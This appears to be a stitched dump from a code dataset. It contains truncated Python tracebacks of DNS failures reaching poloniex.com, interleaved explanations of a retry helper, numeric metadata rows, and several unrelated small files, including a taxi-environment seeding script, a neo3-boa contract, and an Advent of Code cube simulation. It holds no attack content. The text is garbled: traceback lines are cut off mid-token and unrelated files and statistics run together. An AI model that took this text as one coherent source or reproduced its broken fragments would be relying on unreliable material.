File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTn
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
timeout=timeout
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
_stacktrace=sys.exc_info()[2])
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/retry.py"t
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='poloniex.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",g
return func(*args, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",_
ret = _get(**payload)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",t
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",d
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='poloni)
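
The chain above bottoms out in a DNS failure (`socket.gaierror: [Errno -3] Temporary failure in name resolution`), which urllib3 surfaces as a `MaxRetryError` and requests re-raises as `requests.exceptions.ConnectionError`. A minimal sketch of one way to ride out such transient outages — the `with_retries` helper, its backoff parameters, and the commented `polo.returnOrderBook` usage are illustrative assumptions, not part of the original script:

```python
import time
import requests


def with_retries(func, attempts=5, base_delay=2):
    """Call func(), retrying on transient network failures.

    Sleeps base_delay * 2**n seconds between attempts (exponential
    backoff) and re-raises the last ConnectionError once all
    attempts are exhausted.
    """
    for n in range(attempts):
        try:
            return func()
        except requests.exceptions.ConnectionError:
            if n == attempts - 1:
                raise
            time.sleep(base_delay * 2 ** n)


# Hypothetical usage around the call that failed in the log:
# book = with_retries(lambda: polo.returnOrderBook('BTC_RADS'))
```

This keeps one failed DNS lookup from killing the whole scraping run, at the cost of blocking for the backoff interval between attempts.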
HTTPSConnectionPool(host='poloniex.com', port=443): Max retries excee)
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
(self.host, self.port), self.timeout, **extra_kw)
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/connection
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STR:
File "/usr/lib/python3.5/socket.py", line 732, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, f:
socket.gaierror: [Errno -3] Temporary failure in name resolution
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
chunked=chunked)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpoolt
self._validate_conn(conn)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
conn.connect()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"t
conn = self._new_conn()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTn
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
timeout=timeout
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
_stacktrace=sys.exc_info()[2])
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/retry.py"t
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='poloniex.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",g
return func(*args, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",_
ret = _get(**payload)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",t
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",d
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='poloni)
HTTPSConnectionPool(host='poloniex.com', port=443): Max retries excee)
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
(self.host, self.port), self.timeout, **extra_kw)
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/connection
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STR:
File "/usr/lib/python3.5/socket.py", line 732, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, f:
socket.gaierror: [Errno -3] Temporary failure in name resolution
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
chunked=chunked)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpoolt
self._validate_conn(conn)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
conn.connect()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"t
conn = self._new_conn()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTn
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
timeout=timeout
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
_stacktrace=sys.exc_info()[2])
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/retry.py"t
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='poloniex.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",g
return func(*args, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",_
ret = _get(**payload)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",t
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",d
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='poloni)
[ConnectionError(MaxRetryError("HTTPSConnectionPool(host='poloniex.co]
Exception in thread Thread-14:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
(self.host, self.port), self.timeout, **extra_kw)
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/connection
for res in socket.getaddrinfo(host, port, family, socket.SOCK_STR:
File "/usr/lib/python3.5/socket.py", line 732, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, f:
socket.gaierror: [Errno -3] Temporary failure in name resolution
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
chunked=chunked)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpoolt
self._validate_conn(conn)
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
conn.connect()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"t
conn = self._new_conn()
File "/usr/local/lib/python3.5/dist-packages/urllib3/connection.py"n
self, "Failed to establish a new connection: %s" % e)
urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTn
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
timeout=timeout
File "/usr/local/lib/python3.5/dist-packages/urllib3/connectionpooln
_stacktrace=sys.exc_info()[2])
File "/usr/local/lib/python3.5/dist-packages/urllib3/util/retry.py"t
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='poloniex.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_innr
self.run()
File "/usr/lib/python3.5/threading.py", line 862, in run
self._target(*self._args, **self._kwargs)
File "/home/nate/github/crypto_predict_latest/crypto_predict/code/pg
Poloniex allows 6 calls/second before your IP is banned.
File "/home/nate/github/crypto_predict_latest/crypto_predict/code/ps
File "/home/nate/github/crypto_predict_latest/crypto_predict/code/ps
full depth
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",k
'depth': str(depth)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",g
return func(*args, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/poloniex/__init__.py",_
ret = _get(**payload)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return request('get', url, params=params, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/api.py", linet
return session.request(method=method, url=url, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",t
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/sessions.py",d
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python3.5/dist-packages/requests/adapters.py",d
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='poloni)
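The chained tracebacks above all bottom out in `socket.gaierror: [Errno -3] Temporary failure in name resolution` — a DNS lookup failure that `urllib3` wraps in `NewConnectionError`/`MaxRetryError` and `requests` finally re-raises as `ConnectionError`, killing the polling thread. A minimal retry-with-backoff wrapper is one way to ride out such transient outages. This sketch is not from the original script (`call_with_retry` and its parameters are hypothetical); with `requests` you would pass `exceptions=(requests.exceptions.ConnectionError,)`:

```python
import time


def call_with_retry(fn, exceptions=(Exception,), attempts=3, backoff=0.0):
    """Call fn(); on one of `exceptions`, sleep backoff * 2**attempt seconds
    and retry, re-raising only after the final attempt has failed."""
    for attempt in range(attempts):
        try:
            return fn()
        except exceptions:
            if attempt == attempts - 1:
                raise
            time.sleep(backoff * (2 ** attempt))
```

Wrapping each API call like this keeps a single DNS blip from taking down the whole collector thread, at the cost of delaying the eventual failure by the summed backoff.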
| 50.480702 | 70 | 0.757628 | 2,063 | 14,387 | 5.223461 | 0.073679 | 0.060412 | 0.094933 | 0.11971 | 0.977635 | 0.977635 | 0.977635 | 0.977635 | 0.97216 | 0.97216 | 0 | 0.022715 | 0.106485 | 14,387 | 284 | 71 | 50.658451 | 0.815558 | 0 | 0 | 0.948819 | 0 | 0.098425 | 0.28074 | 0.262112 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8d88e514dc4c25069bc8af6e7e8423a588c68861 | 693 | py | Python | domains/gym_taxi/tests/reproducability.py | AndrewPaulChester/sage-code | 9fe676bfbcbc6f642eca29b30a1027fba2a426a0 | [
"MIT"
] | null | null | null | domains/gym_taxi/tests/reproducability.py | AndrewPaulChester/sage-code | 9fe676bfbcbc6f642eca29b30a1027fba2a426a0 | [
"MIT"
] | null | null | null | domains/gym_taxi/tests/reproducability.py | AndrewPaulChester/sage-code | 9fe676bfbcbc6f642eca29b30a1027fba2a426a0 | [
"MIT"
] | null | null | null | from domains.gym_taxi.envs import taxi_env
import time
import numpy as np
# np.random.seed(1)
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
# np.random.seed(1)
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
# np.random.seed(2)
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
# print(np.random.randint(6))
env = taxi_env.JsonTaxiEnv("mixed", "predictable")
# env.reset()
# env.render()
# env.render()
# time.sleep(2)
# env.reset()
env.seed(1)
env.reset()
env.render()
env.render()
time.sleep(20)
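The commented-out blocks above are probing the same property that the live `env.seed(1)` call relies on: seeding an RNG makes the subsequent draws deterministic. A self-contained illustration using the stdlib `random` module (the `draws` helper is hypothetical, standing in for the `np.random.seed`/`np.random.randint` experiments):

```python
import random


def draws(seed, n=4, high=6):
    """Seed a fresh RNG and return its first n integers in [0, high)."""
    rng = random.Random(seed)
    return [rng.randrange(high) for _ in range(n)]

# Re-seeding with the same value replays the identical sequence,
# which is exactly what env.seed(1) needs for a reproducibility test.
```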
| 17.769231 | 50 | 0.692641 | 115 | 693 | 4.147826 | 0.217391 | 0.251572 | 0.327044 | 0.503145 | 0.754717 | 0.754717 | 0.754717 | 0.754717 | 0.607966 | 0.607966 | 0 | 0.0304 | 0.098124 | 693 | 38 | 51 | 18.236842 | 0.7328 | 0.65368 | 0 | 0.222222 | 0 | 0 | 0.073395 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
570015042da1184e500abb62c5004cc6d759cd0b | 199 | py | Python | whatistheplan/models/__init__.py | Cookie150CC/whatistheplan.com | bcee8f769a0e820b4bc8f619b3fb118fd6f1e68c | [
"MIT"
] | 5 | 2015-04-06T16:56:20.000Z | 2017-03-27T15:34:12.000Z | whatistheplan/models/__init__.py | Cookie150CC/whatistheplan.com | bcee8f769a0e820b4bc8f619b3fb118fd6f1e68c | [
"MIT"
] | 48 | 2015-04-03T23:15:42.000Z | 2018-10-05T19:08:50.000Z | whatistheplan/models/__init__.py | Cookie150CC/whatistheplan.com | bcee8f769a0e820b4bc8f619b3fb118fd6f1e68c | [
"MIT"
] | 7 | 2015-04-10T20:50:17.000Z | 2018-09-07T18:28:09.000Z | """Aggregate all database classes for easy importing"""
from whatistheplan.models.userprofile import UserProfile
from whatistheplan.models.game import Game
from whatistheplan.models.team import Team
| 39.8 | 56 | 0.844221 | 25 | 199 | 6.72 | 0.56 | 0.303571 | 0.410714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095477 | 199 | 4 | 57 | 49.75 | 0.933333 | 0.246231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f509d5a1463b80de35df698cdc839503206f0623 | 66 | py | Python | tests/t5.py | jplevyak/pyc | 9f4bc49be78ba29427841460945ce63826fcd857 | [
"BSD-3-Clause"
] | 3 | 2019-08-21T22:01:35.000Z | 2021-07-25T00:21:28.000Z | tests/t5.py | jplevyak/pyc | 9f4bc49be78ba29427841460945ce63826fcd857 | [
"BSD-3-Clause"
] | null | null | null | tests/t5.py | jplevyak/pyc | 9f4bc49be78ba29427841460945ce63826fcd857 | [
"BSD-3-Clause"
] | null | null | null | print 1 + 2
print 2 - 1
print 2 * 2
print -1
print -(-1)
print ~1
| 9.428571 | 11 | 0.590909 | 15 | 66 | 2.6 | 0.2 | 0.615385 | 0.564103 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 0.272727 | 66 | 6 | 12 | 11 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
f56943657c33c5e8316add28848cfbd4fddae1e4 | 111 | py | Python | boa3_test/test_sc/interop_test/runtime/InvocationCounter.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 25 | 2020-07-22T19:37:43.000Z | 2022-03-08T03:23:55.000Z | boa3_test/test_sc/interop_test/runtime/InvocationCounter.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 419 | 2020-04-23T17:48:14.000Z | 2022-03-31T13:17:45.000Z | boa3_test/test_sc/interop_test/runtime/InvocationCounter.py | hal0x2328/neo3-boa | 6825a3533384cb01660773050719402a9703065b | [
"Apache-2.0"
] | 15 | 2020-05-21T21:54:24.000Z | 2021-11-18T06:17:24.000Z | from boa3.builtin.interop.runtime import invocation_counter
def Main() -> int:
return invocation_counter
| 18.5 | 59 | 0.783784 | 14 | 111 | 6.071429 | 0.857143 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010526 | 0.144144 | 111 | 5 | 60 | 22.2 | 0.884211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
f58794cf9bf98e493a3a35302bab8601d4799839 | 190 | py | Python | iotbx/command_line/reflection_file_editor.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 155 | 2016-11-23T12:52:16.000Z | 2022-03-31T15:35:44.000Z | iotbx/command_line/reflection_file_editor.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 590 | 2016-12-10T11:31:18.000Z | 2022-03-30T23:10:09.000Z | iotbx/command_line/reflection_file_editor.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 115 | 2016-11-15T08:17:28.000Z | 2022-02-09T15:30:14.000Z | from __future__ import absolute_import, division, print_function
import sys
from iotbx import reflection_file_editor
if __name__ == "__main__":
reflection_file_editor.run(sys.argv[1:])
| 23.75 | 64 | 0.810526 | 26 | 190 | 5.230769 | 0.692308 | 0.205882 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005952 | 0.115789 | 190 | 7 | 65 | 27.142857 | 0.803571 | 0 | 0 | 0 | 0 | 0 | 0.042105 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0.2 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1961f9b770d13814d3cde43fc000846f59887ef3 | 102 | py | Python | execute_517/__init__.py | Cadair/execute-517 | f57b05ceda3caf5f34b0790260b14604b60f583a | [
"BSD-3-Clause"
] | null | null | null | execute_517/__init__.py | Cadair/execute-517 | f57b05ceda3caf5f34b0790260b14604b60f583a | [
"BSD-3-Clause"
] | 2 | 2020-11-10T13:31:09.000Z | 2020-11-10T14:54:11.000Z | execute_517/__init__.py | Cadair/execute-517 | f57b05ceda3caf5f34b0790260b14604b60f583a | [
"BSD-3-Clause"
] | null | null | null | from .version import __version__
from .run import run_python_in_env
__all__ = ['run_python_in_env']
| 17 | 34 | 0.803922 | 16 | 102 | 4.25 | 0.5 | 0.264706 | 0.323529 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127451 | 102 | 5 | 35 | 20.4 | 0.764045 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
198779f7a1fa7bbbc94dfcd521af04b52b5f0a53 | 6,109 | py | Python | 2020/Day17/Cubes.py | dh256/adventofcode | 428eec13f4cbf153333a0e359bcff23070ef6d27 | [
"MIT"
] | null | null | null | 2020/Day17/Cubes.py | dh256/adventofcode | 428eec13f4cbf153333a0e359bcff23070ef6d27 | [
"MIT"
] | null | null | null | 2020/Day17/Cubes.py | dh256/adventofcode | 428eec13f4cbf153333a0e359bcff23070ef6d27 | [
"MIT"
] | null | null | null | class Cubes:
# get active cubes
    # range spans min-1 to max+1 in each dimension
def ranges(self):
active_cubes = [item[0] for item in list(filter(lambda i:i[1],self.grid.items()))]
min_x = min(active_cubes,key=lambda i:i[0])[0]
max_x = max(active_cubes,key=lambda i:i[0])[0]
min_y = min(active_cubes,key=lambda i:i[1])[1]
max_y = max(active_cubes,key=lambda i:i[1])[1]
min_z = min(active_cubes,key=lambda i:i[2])[2]
max_z = max(active_cubes,key=lambda i:i[2])[2]
return (min_x-1,max_x+1,min_y-1,max_y+1,min_z-1,max_z+1)
def __init__(self,filename) -> None:
self.grid = {} # grid - key is coord of cube, value is state (False, inactive; True, active)
with open(filename,"r") as input_file:
initial_grid_points = [line.strip('\n') for line in input_file]
x = 0
y = 0
z = 0
for row in initial_grid_points:
x = 0
for c in row:
self.grid[(x,y,z)] = c == '#'
x += 1
y += 1
def get_neighbours(self,coord):
neighbours = [(x,y,z) for x in range(coord[0]-1,coord[0]+2) for y in range(coord[1]-1,coord[1]+2) for z in range(coord[2]-1,coord[2]+2)]
# make sure they are all in the grid
for neighbour in neighbours:
if neighbour not in self.grid.keys():
self.grid[neighbour] = False
# remove actual coord
neighbours.remove(coord)
return neighbours
def cycle(self,cycles):
        # For every cube in the bounding box, count its active neighbours:
        # an inactive cube with exactly 3 active neighbours turns on, and an
        # active cube with other than 2 or 3 active neighbours turns off.
        # Cubes to flip are queued in switch_list and flipped after the scan.
# Repeat cycle number of times
for cycle in range(0,cycles):
# get all active cubes
switch_list = [] # contains the co-ords of all cubes to switch
ranges = self.ranges()
# for each cube - get neighbours
for x in range(ranges[0],ranges[1]+1):
for y in range(ranges[2],ranges[3]+1):
for z in range(ranges[4],ranges[5]+1):
neighbours = self.get_neighbours((x,y,z))
active_neighbours = len([n for n in neighbours if self.grid[n]])
if (self.grid[(x,y,z)] and active_neighbours not in (2,3)) or (not self.grid[(x,y,z)] and active_neighbours == 3):
switch_list.append((x,y,z))
for cube in switch_list:
                if cube not in self.grid:
self.grid[cube] = False
self.grid[cube] = not self.grid[cube]
# return number of active cubes
return len(list(filter(lambda v:v,self.grid.values())))
class Cubes2:
# get active cubes
# range is the min-1 to nax-1 for each dimension
def ranges(self):
active_cubes = [item[0] for item in list(filter(lambda i:i[1],self.grid.items()))]
min_x = min(active_cubes,key=lambda i:i[0])[0]
max_x = max(active_cubes,key=lambda i:i[0])[0]
min_y = min(active_cubes,key=lambda i:i[1])[1]
max_y = max(active_cubes,key=lambda i:i[1])[1]
min_z = min(active_cubes,key=lambda i:i[2])[2]
max_z = max(active_cubes,key=lambda i:i[2])[2]
min_w = min(active_cubes,key=lambda i:i[3])[3]
max_w = max(active_cubes,key=lambda i:i[3])[3]
return (min_x-1,max_x+1,min_y-1,max_y+1,min_z-1,max_z+1,min_w-1,max_w+1)
def __init__(self,filename) -> None:
self.grid = {} # grid - key is coord of cube, value is state (False, inactive; True, active)
with open(filename,"r") as input_file:
initial_grid_points = [line.strip('\n') for line in input_file]
x = 0
y = 0
z = 0
w = 0
for row in initial_grid_points:
x = 0
for c in row:
self.grid[(x,y,z,w)] = c == '#'
x += 1
y += 1
def get_neighbours(self,coord):
neighbours = [(x,y,z,w) for x in range(coord[0]-1,coord[0]+2) for y in range(coord[1]-1,coord[1]+2) for z in range(coord[2]-1,coord[2]+2) for w in range(coord[3]-1,coord[3]+2)]
# make sure they are all in the grid
for neighbour in neighbours:
if neighbour not in self.grid.keys():
self.grid[neighbour] = False
# remove actual coord
neighbours.remove(coord)
return neighbours
def cycle(self,cycles):
        # For every cube in the bounding box, count its active neighbours:
        # an inactive cube with exactly 3 active neighbours turns on, and an
        # active cube with other than 2 or 3 active neighbours turns off.
        # Cubes to flip are queued in switch_list and flipped after the scan.
# Repeat cycle number of times
for cycle in range(0,cycles):
# get all active cubes
switch_list = [] # contains the co-ords of all cubes to switch
ranges = self.ranges()
# for each cube - get neighbours
for x in range(ranges[0],ranges[1]+1):
for y in range(ranges[2],ranges[3]+1):
for z in range(ranges[4],ranges[5]+1):
for w in range(ranges[6],ranges[7]+1):
neighbours = self.get_neighbours((x,y,z,w))
active_neighbours = len([n for n in neighbours if self.grid[n]])
if (self.grid[(x,y,z,w)] and active_neighbours not in (2,3)) or (not self.grid[(x,y,z,w)] and active_neighbours == 3):
switch_list.append((x,y,z,w))
for cube in switch_list:
                if cube not in self.grid:
self.grid[cube] = False
self.grid[cube] = not self.grid[cube]
# return number of active cubes
return len(list(filter(lambda v:v,self.grid.values())))
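`Cubes` and `Cubes2` differ only in the number of dimensions hard-coded into their comprehensions. As a sketch (not part of the original solution), the neighbour enumeration generalises to any dimensionality with `itertools.product`:

```python
from itertools import product


def get_neighbours(coord):
    """Every cell whose coordinates each differ from coord's by at most 1,
    excluding coord itself: 3**len(coord) - 1 neighbours in total."""
    return [cell
            for cell in product(*(range(c - 1, c + 2) for c in coord))
            if cell != coord]
```

With this helper, a single class parameterised by a tuple length could replace both `Cubes` (26 neighbours per cell) and `Cubes2` (80 per cell).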
| 44.591241 | 197 | 0.543133 | 943 | 6,109 | 3.42948 | 0.101803 | 0.064317 | 0.039579 | 0.08658 | 0.972789 | 0.971861 | 0.971552 | 0.969697 | 0.935993 | 0.935374 | 0 | 0.031412 | 0.33819 | 6,109 | 137 | 198 | 44.591241 | 0.768489 | 0.176625 | 0 | 0.8125 | 0 | 0 | 0.001597 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5ff85b78082b4439aba47027801b0952f89e55f9 | 33,068 | py | Python | 2018/Day08.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | 2018/Day08.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | 2018/Day08.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
